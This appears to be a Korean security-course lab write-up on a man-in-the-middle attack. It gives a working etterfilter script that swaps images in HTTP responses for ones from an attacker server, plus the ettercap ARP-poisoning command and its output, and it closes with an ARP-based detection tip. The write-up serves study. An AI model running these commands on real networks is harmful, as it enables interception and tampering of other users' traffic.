Day 74 (Web mitm)

<목차>

1. 목적

2. 사용 툴 & 구성 환경

3. 실습 과정

4. 결과 확인

---

1. 목적

중간자 공격(man in the middle attack, MITM)은 네트워크 통신을 조작하여 통신 내용을 도청하거나 조작하는 공격 기법이다. 공격자가 피해자와 정상 서버 간 통신에 끼어서 피해자가 수신하는 데이터에 변조 서버에 있는 잘못된 데이터를 끼워넣기/빼기/복호화 등 데이터 흐름에 영향을 미치는 공격이다.

 

2. 사용 툴 & 구성 환경

1) Ettercap :  ARP spoofing과 fragreouter 기능을 동시에 수행하는 공격의 핵심 툴 

 

2) Etterfilter : Text파일을 Binary파일로 컴파일 해주는 툴, Ettercap패키지안에내장되어있다.

 

3) 구성 환경

	IP(정상 Web서버는 도메인)	운영 체제
피해자	192.168.111.29	Windows XP
공격자	192.168.111.25	Cent OS 5
변조 Web 서버	192.168.111.154	Cent OS 7
정상 Web 서버	http://mbnmoney.mbn.co.kr	알 수 없음

 

3. 실습 과정

[root@ap ~]# cat /app/apache/htdocs/index.html
<html>
<head>
    <title></title>
</head>
<body>
    <?php
        echo "<img src='111.png'/>";
    ?>
</body>
</html>

변조 Web서버에서 사용할 사진을 확인하기 위해 코드를 작성한다.

변조 서버에서 사용할 사진이다.

[root@os5 ~]# cat filter.txt    // filter동작을 할 코드를 txt파일로 작성한다.
if (ip.proto == TCP && tcp.src == 80)
{
  replace("img src=", "img src=\"http://192.168.111.154/111.png\"");
  replace("IMG SRC=", "img src=\"http://192.168.111.154/111.png\"");
  msg("Replaced the pic. \n");
}

[root@os5 ~]# etterfilter -o filter.ef filter.txt // filter.txt파일을 binary파일로 변환한다.

[root@os5 ~]#  ettercap -T -q -F filter.ef -M ARP /192.168.111.29/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from filter.ef...
Listening on eth0... (Ethernet)

  eth0 ->       00:0C:29:4C:BA:73    192.168.111.25     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 65534 GID 65534...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (1 hosts)...

* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

 GROUP 1 : 192.168.111.29 00:0C:29:08:87:32

 GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

공격을 수행한다.

공격 전의 정상 Web페이지이다.

공격에 성공하였다.

4. 결과 확인

 

(좌) 정상적인 상태의 피해자가 수신한 패킷 (우) 공격 당한 상태의 피해자가 수신한 패킷

정상적인 상태는 패킷이 정상 Web서버와 피해자가 통신을 하지만 mitm공격을 하게되면 정상 Web서버에서 피해자에게 오는 과정에서 패킷을 변조하기 때문에 변조 Web서버에서 피해자에게 패킷을 송신하는것으로 패킷이 나타난다. 또한 패킷에 전송되는 데이터를 보면 변조된 파일 이름이 나타난다. 

공격을 할때에는 ettercap을 실행하게 되는데 마지막에 //가 없으면 그림이 변경되지 않았다.

 

 

피해자의 arp정보를 보게되면 모든 네트워크 통신에서의 MAC주소가 공격자의 MAC주소로 변경된 것을 알 수 있다.

따라서 mitm는 현재 연결된 네트워크의 arp를 확인하여 탐지가 할수있다.